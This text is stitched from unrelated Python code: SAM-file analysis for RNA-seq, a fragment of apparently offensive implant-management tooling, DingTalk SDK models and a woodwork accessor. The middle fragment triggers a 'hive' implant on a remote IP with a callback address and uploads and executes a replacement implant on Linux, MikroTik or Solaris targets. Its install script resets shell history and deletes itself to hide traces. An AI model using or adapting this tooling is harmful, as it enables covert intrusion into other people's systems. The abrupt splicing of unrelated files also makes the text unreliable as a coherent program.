if (flagCode & 0x0001) ==0:
print >>sys.stderr,"NOT pair-end sequencing"
sys.exit(1)
if (flagCode & 0x0004) != 0: continue #skip unmap reads
if not ParseSAM._uniqueHit_pat.search(line): #skip multiple mapped reads
continue
if (flagCode & 0x0008 !=0): #skip single-end mapped reads
continue
if (fields[7] =='0'):
continue
if (int(fields[3]) > int(fields[7])): #left < right
continue
pair_num +=1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
read_len = len(fields[9])
if (len(comb)==1): # this read is NOT spliced
frag_size = (int(fields[7]) - int(fields[3]) +1) + read_len
elif (len(comb) >1): # this read is spliced
frag_size = (int(fields[7]) - int(fields[3]) +1) + read_len - sum(comb[1::2])
FO.write(fields[0] + '\t' + str(frag_size) + '\n')
if frag_size <= low_bound:
ultra_low+=1
continue
elif frag_size > up_bound:
ultra_high +=1
continue
ranges[chrom].add_interval( Interval( frag_size-1, frag_size ) )
print >>sys.stderr, "Done"
if pair_num==0:
print >>sys.stderr, "Cannot find paired reads"
sys.exit(0)
print >>FQ, "Total paired read " + str(pair_num)
print >>FQ, "<=" + str(low_bound) + "\t"+ str(ultra_low)
for st in window_left_bound:
size.append(str(st + step/2))
count = str(len(ranges[chrom].find(st,st + step)))
counts.append(count)
print >>FQ, str(st) + '\t' + str(st+step) +'\t' + count
print >>FQ, ">" + str(up_bound) + "\t"+ str(ultra_high)
print >>RS, "pdf('gFragSize.pdf')"
print >>RS, "par(mfrow=c(2,1),cex.main=0.8,cex.lab=0.8,cex.axis=0.8,mar=c(4,4,4,1))"
print >>RS, 'pie(c(%d,%d,%d),col=rainbow(3),cex=0.5,radius=1,main="Total %d fragments",labels=c("fraSize <= %d\\n(%4.2f%%)","fragSize > %d\\n(%4.2f%%)","%d < fragSize <= %d\\n(%4.2f%%)"), density=rep(80,80,80),angle=c(90,140,170))' % (ultra_low, ultra_high, pair_num -ultra_low -ultra_high, pair_num, low_bound, ultra_low*100/pair_num, up_bound, ultra_high*100/pair_num, low_bound, up_bound, 100-ultra_low*100/pair_num - ultra_high*100/pair_num)
print >>RS, 'fragsize=rep(c(' + ','.join(size) + '),' + 'times=c(' + ','.join(counts) + '))'
print >>RS, 'frag_sd = round(sd(fragsize))'
print >>RS, 'frag_mean = round(mean(fragsize))'
print >>RS, 'hist(fragsize,probability=T,breaks=%d,xlab="Fragment size (bp)",main=paste(c("Mean=",frag_mean,";","SD=",frag_sd),collapse=""),border="blue")' % len(window_left_bound)
print >>RS, "lines(density(fragsize,bw=%d),col='red')" % (2*step)
print >>RS ,"dev.off()"
FO.close()
FQ.close()
RS.close()
#self.f.seek(0)
def saturation_RPKM(self,refbed,outfile=None,sample_start=5,sample_step=5,sample_end=100):
'''for each gene, check if its RPKM (epxresion level) has already been saturated or not'''
if refbed is None:
print >>sys.stderr,"You must specify a bed file representing gene model\n"
exit(0)
if outfile is None:
rpkm_file = self.fileName + ".eRPKM.xls"
raw_file = self.fileName + ".rawCount.xls"
else:
rpkm_file = outfile + ".eRPKM.xls"
raw_file = outfile + ".rawCount.xls"
RPKM_OUT = open(rpkm_file,'w')
RAW_OUT = open(raw_file ,'w')
ranges={}
totalReads=0
cUR_num = 0 #number
block_list=[] #non-spliced read AS IS, splicing reads were counted multiple times
#read SAM
my_pat = re.compile(r'NH:i:(\d+)\b')
NH_tag=0
print >>sys.stderr, "Reading "+ self.fileName + '...',
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
flagCode=string.atoi(fields[1])
if (flagCode & 0x0004) != 0: continue #skip unmap reads
totalReads +=1
hitNum =[int(i) for i in my_pat.findall(line)]
if len(hitNum) ==0:
NH_tag=1 #cannot determine uniqness without NH tag
elif len(hitNum) ==1:
if int(hitNum[0])>1: continue #skip multiple mapped reads
else:
print >>sys.stderr, "More than 1 NH tag found within a single line. Incorrect SAM format!"
sys.exit(1)
chrom = fields[2].upper()
chromStart = string.atoi(fields[3])-1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
cUR_num += (len(comb) +1)/2
blockStart=[]
blockSize=[]
for i in range(0,len(comb),2):
blockStart.append(chromStart + sum(comb[:i]) )
for i in range(0,len(comb),2):
blockSize.append(comb[i])
for st,size in zip(blockStart,blockSize):
mid = int(st) + (size/2)
block_list.append(chrom + ":" + str(mid))
if NH_tag==1:
print >>sys.stderr, "Warn: NO NH tag found. Cannot determine uniqueness of alignment. All alignments will be used"
print >>sys.stderr, "Done"
print >>sys.stderr, "shuffling alignments ...",
random.shuffle(block_list)
print >>sys.stderr, "Done"
ranges={}
sample_size=0
frag_total = cUR_num
RPKM_table=collections.defaultdict(list)
rawCount_table=collections.defaultdict(list)
RPKM_head=['chr','start','end','name','score','strand']
tmp=range(sample_start,sample_end,sample_step)
tmp.append(100)
#=========================sampling uniquely mapped reads from population
for pertl in tmp: #[5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95,100]
index_st = int(frag_total * (pertl-sample_step)/100.0)
index_end = int(frag_total * pertl/100.0)
if | |
0))
installationFile.write(self.get('Payload', 'tempPayload', 0))
installationFile.write(" 2>/dev/null\n")
installationFile.write('\n')
installationFile.write("#Reset History.\n")
installationFile.write("HISTSIZE=$OLDHISTSIZE\n")
installationFile.write("export HISTSIZE\n")
installationFile.write("set HISTFILE $OLDHISTFILE\n")
installationFile.write("export HISTFILE\n")
installationFile.write('\n')
installationFile.write('#Remove the installation script...\n')
installationFile.write('rm -f $fileToDelete 2>/dev/null\n')
installationFile.close()
#================================================================
def makeInstallationScript(self):
'''
Depending on the operatingSystem of the remote targgeted box, creates the installation
script by calling on of the following:
self.make_Linux_hiveUpdateInstallationScript()
self.make_MT_hiveUpdateInstallationScript()
self.make_Solaris_hiveUpdateInstallationScript()
'''
#Delete the installFile if it exists now for convenience and recreate it...
if os.path.isfile(self.get('Payload', 'installation_Script_Name',0)):
os.remove(self.get('Payload', 'installation_Script_Name',0))
OS = self.get('Remote', 'operatingSystem', 0)
#Linux
if OS == "Linux":
self.make_Linux_hiveUpdateInstallationScript()
#Mikrotik
elif OS == "Mikrotik PPC":
self.make_MT_hiveUpdateInstallationScript()
elif OS == "Mikrotik x86":
self.make_MT_hiveUpdateInstallationScript()
elif OS == "Mikrotik MIPS LE":
self.make_MT_hiveUpdateInstallationScript()
elif OS == "Mikrotik MIPS BE":
self.make_MT_hiveUpdateInstallationScript()
#Solaris
elif OS == "Solaris Sparc":
print "\n\n\n Making Solaris Script\n\n\n"
self.make_Solaris_hiveUpdateInstallationScript()
elif OS == "Solaris x86":
self.make_Solaris_hiveUpdateInstallationScript()
else:
print "\n\n This only works for MT, Linux, or Solaris systems at this time.\n\n"
#================================================================
def runHiveOperation(self):
'''
If the configuration File operation is set to 'hiveUpdate' it runs the runSingleUpdateOperation function.
If the configuration File operation is set to 'hiveResetTimer', it will execute the runSingleResetOperation.
'''
print "\n\n runHiveOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
if self.get('Payload', 'operation', 0) == 'hiveUpdate':
self.runSingleUpdateOperation()
elif self.get('Payload', 'operation', 0) == 'hiveResetTimer':
self.runSingleResetOperation()
else:
print "\n\n runHiveOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " No Valid Operations Found."
#================================================================
def runHiveConnectOperation(self):
'''
Uses pexpect to connect to the the target hive machine maintaining a log file
simultaneously called cutthroat_hiveOperation_yyyymmdd_HHMMSS.log
'''
# Pexpect starts cutthroat
#
# ./cutthroat ./hive
#
#
#Starts cutthroat and displays the initial startup
commandLine="./cutthroat ./hive"
print "Trying to spawn "+commandLine
cutT = pexpect.spawn(commandLine)
if self.logfileName == "None":
now=datetime.now()
self.logfileName="cutthroat_hiveOperation_"+now.strftime('%Y%m%d_%H%M%S.')+"log"
print "\n\nSetting Log File to %s\n\n" % (self.logfileName)
fout = file(self.logfileName, 'w')
else:
fout = file(self.logfileName, 'a')
cutT.logfile=fout
#Save cutT for use in other operations...
self.cutT = cutT
#Always set connectionStatus to false at the beginning of this function.
#Only this function will set the connectionStatus except for init...
self.connectionStatus = False;
print "\n\n runHiveConnectOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
hiveTimeout = self.get('Remote','hiveTimeout',0)
index = cutT.expect( ['> ', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print "Matched first index of \>"
print cutT.before
print cutT.after
elif index == 1:
print "FAILED MATCH: Desired match did not occur..."
print cutT.before
print cutT.after
elif index == 2:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
#pattern="['> ', pexpect.EOF, pexpect.TIMEOUT]"
#cut_3_interface( cutT, pattern, 20)
if validIP( self.get('Remote', 'remoteIP', 0) ):
pass
else:
print "\n\n\n\n\n runHiveConnectOperation: RemoteIP must be set...\n\n\n\n\n\n"
sys.exit()
#We will delete any previously built files for this remoteIP for convenience
if os.path.isfile(self.get('Remote', 'remoteIP', 0)):
os.remove(self.get('Remote', 'remoteIP', 0))
print "Starting connect sequence."
#
#
# ilm connect ${remoteIP}
#
#
#connection='ilm connect 10.2.9.6'
connection='ilm connect '+self.get('Remote', 'remoteIP', 0) +''
cutT.sendline(connection)
#This section assumes the remoteIP file does not exist so it prompts the user for input...
index = cutT.expect( ['\? ', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print cutT.before
elif index == 1:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 2:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
#cutT.sendline(' 10.3.2.19') #callback address
cutT.sendline(' '+self.get('Local', 'localIP', 0)) #callback address
patternA="\?"
cut_3_interface( cutT, patternA, 20, "callbackIPsent")
cutT.sendline(' '+self.get('Local', 'localPort', 0)) #callback port
cut_3_interface( cutT, patternA, 20, "callbackPortsent")
#cutT.sendline(" 10.2.9.6") #remote IP Address
cutT.sendline(' '+self.get('Remote', 'remoteIP', 0)) #remote IP Address
cut_3_interface( cutT, patternA, 20, "remoteIPsent")
#cutT.sendline(" dns-request")
cutT.sendline(' '+self.get('Remote', 'triggerProtocol', 0))
if (self.get('Remote', 'triggerProtocol', 0) == "raw-udp") or (self.get('Remote', 'triggerProtocol', 0) == "raw-tcp"):
cut_3_interface( cutT, patternA, 15, "rawTriggersent")
cutT.sendline(' '+str(self.get('Remote', 'remotePort', 0)))
#
#
# Sends the trigger...
#
#
index = cutT.expect( [' Trigger sent.', '> ', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print cutT.before
print cutT.after
now=datetime.now()
print " Sent on "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Matched >, raw-tcp post on remote host could not be reached..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
print "\n\n Waiting... \n\n"
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=int(hiveTimeout) )
if index == 0:
print "Received response."
print "\n\nself.connectionStatus being set to True...\n\n"
self.connectionStatus = True;
print cutT.before
print cutT.after
elif index == 1:
print "Failure occurred"
self.connectionStatus = False;
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
self.connectionStatus = False;
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (int(hiveTimeout))
now=datetime.now()
print " Trigger Timed out on "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
self.connectionStatus = False;
print cutT.before
print cutT.after
print "\n\nFAILED INITIAL TRIGGER RESPONSE from "+self.get('Remote', 'remoteIP', 0)+".\n\n"
print "\n\n runHiveConnectOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now ending..."
#================================================================
def runSingleUpdateOperation(self):
'''
Uses pexpect to upload new implant, installScript, and make them executable while
maintaining a log file simultaneously called cutthroat_hiveOperation_yyyymmdd_HHMMSS.log
'''
#Create Installation File
self.makeInstallationScript()
#Establishes initial connection to hive server
self.runHiveConnectOperation()
#runHiveConnectOperation establishes cutT...
cutT = self.cutT
if self.connectionStatus == True:
print "\n\n runSingleUpdateOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
# Pexpect starts cutthroat
#
# ./cutthroat ./hive
#
#
#Starts cutthroat and displays the initial startup
#fileName=logFile
#fout = file(fileName, 'w')
#cutT.logfile=fout
ctCommand= " file put "+self.get('Payload', 'newPayload', 0)+" "+self.get('Remote', 'installationDirectory', 0) + self.get('Payload', 'tempPayload', 0)
cutT.sendline(ctCommand)
#
#
# Sends the updated hive...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print "Received response."
print cutT.before
print cutT.after
now=datetime.now()
print " Updated hive sent as newhive on "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# This line is specific to mikrotik routers for now...
#cutT.sendline(" cmd exec \"chmod 755 /rw/pckg/newhive\"")
ctCommand= " cmd exec \"chmod 755 "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'tempPayload', 0)+"\""
cutT.sendline(ctCommand)
#
#
# Makes the tempPayload executable...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print "tempPayload executable response."
print cutT.before
print cutT.after
now=datetime.now()
print " Updated tempPayload is executable at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# The following line is specific to mikrotik routers for now...
#cutT.sendline(" file put installScript /rw/pckg/installScript")
ctCommand= " file put "+self.get('Payload', 'installation_Script_Name', 0)+" "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)
cutT.sendline(ctCommand)
#
#
# Sends the installScript...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+ " installed response."
print cutT.before
print cutT.after
now=datetime.now()
print " installScript ["+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+"] is put on device at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# This line is specific to mikrotik routers for now...
#cutT.sendline(" cmd exec \"chmod 755 /rw/pckg/installScript\"")
ctCommand= " cmd exec \"chmod 755 "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+"\""
cutT.sendline(ctCommand)
#
#
# Makes the installScript executable...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print "installedScript ["+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+" executable response."
print cutT.before
print cutT.after
now=datetime.now()
print " installScript is now executable at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# This line is specific to mikrotik routers for now...
now=datetime.now()
#cutT.sendline(" cmd exec /rw/pckg/installScript")
ctCommand= " cmd exec "+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)
cutT.sendline(ctCommand)
#
#
# Runs the installScript ... Note that the hive trigger should now timeout
# since the install script should remove
# all currently running hive processes including
# our currently triggered implant and replace the
# existing hive with the new hive implant...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [ pexpect.TIMEOUT, response, 'Failure', pexpect.EOF] , timeout=int(self.defaultTimeout + 180) )
if index == 0:
print "Expected timeout occurred since the existing hive is currently being replaced..."
print cutT.before
print cutT.after
print " installScript ["+self.get('Remote', 'installationDirectory', 0)+self.get('Payload', 'installation_Script_Name', 0)+" was started at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
now=datetime.now()
print " Hive should have been replaced by now at "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs after " + str( self.defaultTimeout + 180) + " seconds timeout."
elif index == 1:
print "Should never have gotten here for the response... ERROR ERROR ERROR"
print cutT.before
print cutT.after
elif index == 2:
print "Should never have gotten here for Failure... ERROR ERROR ERROR"
print cutT.before
print cutT.after
elif index == 3:
print "EOF occurred"
print cutT.before
print cutT.after
print "\n\n runSingleUpdateOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now ending..."
#Re-Establishing Connection to test update
self.runSingleResetOperation()
else:
self.logFinalOperationResult("--FAILURE, NO CONNECTION DURING runSingleUpdateOperation--")
#================================================================
def runSingleResetOperation(self):
'''
Uses pexpect to Connect to the the target hive machine then immediately disconnect
maintaining a log file simultaneously called cutthroat_hiveOperation_yyyymmdd_HHMMSS.log
'''
hiveTimeout = self.get('Remote','hiveTimeout',0)
#Establishes initial connection to hive server
self.runHiveConnectOperation()
#runHiveConnectOperation establishes cutT...
cutT = self.cutT
if self.connectionStatus == True:
print "\n\n runSingleResetOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
ctCommand= " quit "
cutT.sendline(ctCommand)
#
#
# Closing Connection | |
temp_model.from_map(m['body'])
return self
class QueryCityCarApplyHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class QueryCityCarApplyRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
created_end_at: str = None,
created_start_at: str = None,
page_number: int = None,
page_size: int = None,
third_part_apply_id: str = None,
user_id: str = None,
):
# 第三方企业ID
self.corp_id = corp_id
# 审批单创建时间小于值
self.created_end_at = created_end_at
# 审批单创建时间大于等于值
self.created_start_at = created_start_at
# 页码,要求大于等于1,默认1
self.page_number = page_number
# 每页数据量,要求大于等于1,默认20
self.page_size = page_size
# 三方审批单ID
self.third_part_apply_id = third_part_apply_id
# 第三方员工ID
self.user_id = user_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.created_end_at is not None:
result['createdEndAt'] = self.created_end_at
if self.created_start_at is not None:
result['createdStartAt'] = self.created_start_at
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.third_part_apply_id is not None:
result['thirdPartApplyId'] = self.third_part_apply_id
if self.user_id is not None:
result['userId'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('createdEndAt') is not None:
self.created_end_at = m.get('createdEndAt')
if m.get('createdStartAt') is not None:
self.created_start_at = m.get('createdStartAt')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('thirdPartApplyId') is not None:
self.third_part_apply_id = m.get('thirdPartApplyId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
return self
class QueryCityCarApplyResponseBodyApplyListApproverList(TeaModel):
def __init__(
self,
note: str = None,
operate_time: str = None,
order: int = None,
status: int = None,
status_desc: str = None,
user_id: str = None,
user_name: str = None,
):
# 审批备注
self.note = note
# 审批时间
self.operate_time = operate_time
# 审批人排序值
self.order = order
# 审批状态枚举:审批状态:0-审批中,1-已同意,2-已拒绝
self.status = status
# 审批状态描述
self.status_desc = status_desc
# 审批员工ID
self.user_id = user_id
# 审批员工名
self.user_name = user_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.note is not None:
result['note'] = self.note
if self.operate_time is not None:
result['operateTime'] = self.operate_time
if self.order is not None:
result['order'] = self.order
if self.status is not None:
result['status'] = self.status
if self.status_desc is not None:
result['statusDesc'] = self.status_desc
if self.user_id is not None:
result['userId'] = self.user_id
if self.user_name is not None:
result['userName'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('note') is not None:
self.note = m.get('note')
if m.get('operateTime') is not None:
self.operate_time = m.get('operateTime')
if m.get('order') is not None:
self.order = m.get('order')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('statusDesc') is not None:
self.status_desc = m.get('statusDesc')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('userName') is not None:
self.user_name = m.get('userName')
return self
class QueryCityCarApplyResponseBodyApplyListItineraryList(TeaModel):
def __init__(
self,
arr_city: str = None,
arr_city_code: str = None,
arr_date: str = None,
cost_center_id: int = None,
cost_center_name: str = None,
dep_city: str = None,
dep_city_code: str = None,
dep_date: str = None,
invoice_id: int = None,
invoice_name: str = None,
itinerary_id: str = None,
project_code: str = None,
project_title: str = None,
traffic_type: int = None,
):
# 目的地城市
self.arr_city = arr_city
# 目的地城市三字码
self.arr_city_code = arr_city_code
# 到达目的地城市时间
self.arr_date = arr_date
# 商旅内部成本中心ID
self.cost_center_id = cost_center_id
# 成本中心名称
self.cost_center_name = cost_center_name
# 出发城市
self.dep_city = dep_city
# 出发城市三字码
self.dep_city_code = dep_city_code
# 出发时间
self.dep_date = dep_date
# 商旅内部发票抬头ID
self.invoice_id = invoice_id
# 发票抬头名称
self.invoice_name = invoice_name
# 商旅内部行程单ID
self.itinerary_id = itinerary_id
# 项目code
self.project_code = project_code
# 项目名称
self.project_title = project_title
# 交通方式:4-市内交通
self.traffic_type = traffic_type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.arr_city is not None:
result['arrCity'] = self.arr_city
if self.arr_city_code is not None:
result['arrCityCode'] = self.arr_city_code
if self.arr_date is not None:
result['arrDate'] = self.arr_date
if self.cost_center_id is not None:
result['costCenterId'] = self.cost_center_id
if self.cost_center_name is not None:
result['costCenterName'] = self.cost_center_name
if self.dep_city is not None:
result['depCity'] = self.dep_city
if self.dep_city_code is not None:
result['depCityCode'] = self.dep_city_code
if self.dep_date is not None:
result['depDate'] = self.dep_date
if self.invoice_id is not None:
result['invoiceId'] = self.invoice_id
if self.invoice_name is not None:
result['invoiceName'] = self.invoice_name
if self.itinerary_id is not None:
result['itineraryId'] = self.itinerary_id
if self.project_code is not None:
result['projectCode'] = self.project_code
if self.project_title is not None:
result['projectTitle'] = self.project_title
if self.traffic_type is not None:
result['trafficType'] = self.traffic_type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('arrCity') is not None:
self.arr_city = m.get('arrCity')
if m.get('arrCityCode') is not None:
self.arr_city_code = m.get('arrCityCode')
if m.get('arrDate') is not None:
self.arr_date = m.get('arrDate')
if m.get('costCenterId') is not None:
self.cost_center_id = m.get('costCenterId')
if m.get('costCenterName') is not None:
self.cost_center_name = m.get('costCenterName')
if m.get('depCity') is not None:
self.dep_city = m.get('depCity')
if m.get('depCityCode') is not None:
self.dep_city_code = m.get('depCityCode')
if m.get('depDate') is not None:
self.dep_date = m.get('depDate')
if m.get('invoiceId') is not None:
self.invoice_id = m.get('invoiceId')
if m.get('invoiceName') is not None:
self.invoice_name = m.get('invoiceName')
if m.get('itineraryId') is not None:
self.itinerary_id = m.get('itineraryId')
if m.get('projectCode') is not None:
self.project_code = m.get('projectCode')
if m.get('projectTitle') is not None:
self.project_title = m.get('projectTitle')
if m.get('trafficType') is not None:
self.traffic_type = m.get('trafficType')
return self
class QueryCityCarApplyResponseBodyApplyList(TeaModel):
def __init__(
self,
approver_list: List[QueryCityCarApplyResponseBodyApplyListApproverList] = None,
depart_id: str = None,
depart_name: str = None,
gmt_create: str = None,
gmt_modified: str = None,
itinerary_list: List[QueryCityCarApplyResponseBodyApplyListItineraryList] = None,
status: int = None,
status_desc: str = None,
third_part_apply_id: str = None,
trip_cause: str = None,
trip_title: str = None,
user_id: str = None,
user_name: str = None,
):
# 审批单列表
self.approver_list = approver_list
# 员工所在部门ID
self.depart_id = depart_id
# 员工所在部门名
self.depart_name = depart_name
# 创建时间
self.gmt_create = gmt_create
# 最近修改时间
self.gmt_modified = gmt_modified
# 审批单关联的行程
self.itinerary_list = itinerary_list
# 审批单状态:0-申请,1-同意,2-拒绝
self.status = status
# 审批单状态:0-申请,1-同意,2-拒绝
self.status_desc = status_desc
# 三方审批单ID
self.third_part_apply_id = third_part_apply_id
# 申请事由
self.trip_cause = trip_cause
# 审批单标题
self.trip_title = trip_title
# 发起审批员工ID
self.user_id = user_id
# 发起审批员工名
self.user_name = user_name
def validate(self):
if self.approver_list:
for k in self.approver_list:
if k:
k.validate()
if self.itinerary_list:
for k in self.itinerary_list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['approverList'] = []
if self.approver_list is not None:
for k in self.approver_list:
result['approverList'].append(k.to_map() if k else None)
if self.depart_id is not None:
result['departId'] = self.depart_id
if self.depart_name is not None:
result['departName'] = self.depart_name
if self.gmt_create is not None:
result['gmtCreate'] = self.gmt_create
if self.gmt_modified is not None:
result['gmtModified'] = self.gmt_modified
result['itineraryList'] = []
if self.itinerary_list is not None:
for k in self.itinerary_list:
result['itineraryList'].append(k.to_map() if k else None)
if self.status is not None:
result['status'] = self.status
if self.status_desc is not None:
result['statusDesc'] = self.status_desc
if self.third_part_apply_id is not None:
result['thirdPartApplyId'] = self.third_part_apply_id
if self.trip_cause is not None:
result['tripCause'] = self.trip_cause
if self.trip_title is not None:
result['tripTitle'] = self.trip_title
if self.user_id is not None:
result['userId'] = self.user_id
if self.user_name is not None:
result['userName'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
self.approver_list = []
if m.get('approverList') is not None:
for k in m.get('approverList'):
temp_model = QueryCityCarApplyResponseBodyApplyListApproverList()
self.approver_list.append(temp_model.from_map(k))
if m.get('departId') is not None:
self.depart_id = m.get('departId')
if m.get('departName') is not None:
self.depart_name = m.get('departName')
if m.get('gmtCreate') is not None:
self.gmt_create = m.get('gmtCreate')
if m.get('gmtModified') is not None:
self.gmt_modified = m.get('gmtModified')
self.itinerary_list = []
if m.get('itineraryList') is not None:
for k in m.get('itineraryList'):
temp_model = QueryCityCarApplyResponseBodyApplyListItineraryList()
self.itinerary_list.append(temp_model.from_map(k))
if m.get('status') is not None:
self.status = m.get('status')
if m.get('statusDesc') is not None:
self.status_desc = m.get('statusDesc')
if m.get('thirdPartApplyId') is not None:
self.third_part_apply_id | |
import copy
import warnings
import weakref
import pandas as pd
from woodwork.accessor_utils import (
_check_column_schema,
_is_dataframe,
_is_series,
init_series,
)
from woodwork.column_schema import ColumnSchema
from woodwork.exceptions import ParametersIgnoredWarning, TypingInfoMismatchWarning
from woodwork.indexers import _iLocIndexer, _locIndexer
from woodwork.logical_types import _NULLABLE_PHYSICAL_TYPES, LatLong, Ordinal
from woodwork.statistics_utils import _get_box_plot_info_for_column
from woodwork.table_schema import TableSchema
from woodwork.utils import (
_get_column_logical_type,
_is_valid_latlong_series,
import_or_none,
)
dd = import_or_none("dask.dataframe")
ks = import_or_none("databricks.koalas")
class WoodworkColumnAccessor:
def __init__(self, series):
self._series_weakref = weakref.ref(series)
self._schema = None
def init(
self,
logical_type=None,
semantic_tags=None,
use_standard_tags=True,
description=None,
origin=None,
metadata=None,
schema=None,
validate=True,
):
"""Initializes Woodwork typing information for a Series.
Args:
logical_type (LogicalType or str, optional): The logical type that should be assigned
to the series. If no value is provided, the LogicalType for the series will
be inferred. If the LogicalType provided or inferred does not have a dtype that
is compatible with the series dtype, an error will be raised.
semantic_tags (str or list or set, optional): Semantic tags to assign to the series.
Defaults to an empty set if not specified. There are two options for
specifying the semantic tags:
